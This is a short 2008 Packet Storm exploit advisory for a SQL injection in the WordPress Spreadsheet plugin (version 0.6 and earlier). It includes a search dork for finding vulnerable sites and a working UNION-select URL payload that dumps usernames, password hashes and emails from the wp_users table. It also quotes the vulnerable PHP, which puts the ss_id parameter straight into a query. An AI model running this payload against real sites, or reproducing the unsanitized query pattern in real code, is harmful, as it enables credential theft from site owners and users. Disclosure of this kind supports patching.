wpspreadsheet-sql.txt

2008-04-23T00:00:00
ID PACKETSTORM:65724
Type packetstorm
Reporter 1ten0.0net1
Modified 2008-04-23T00:00:00

Description

                                        
                                            `===========================================  
There's standart sql-injection in Spreadsheet <= 0.6 Plugin  
# Author : 1ten0.0net1  
# Script : Wordpress Plugin Spreadsheet <= 0.6 v.  
# Download : http://timrohrer.com/blog/?page_id=71  
# BUG : Remote SQL-Injection Vulnerability  
# Dork : inurl:/wp-content/plugins/wpSS/  
Example:  
http://site.com/wp-content/plugins/wpSS/ss_load.php?ss_id=1+and+(1=0)+union+select+1,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4+from+wp_users--&display=plain  
===========================================  
Vulnerable code:  
ss_load.php  
$id = $_GET['ss_id'];  
....  
ss_functions.php:  
function ss_load ($id, $plain=FALSE) {  
....  
if ($wpdb->query("SELECT * FROM $table_name WHERE id='$id'") == 0) {  
....  
  
==> Visit us @ forum.antichat.ru  
  
`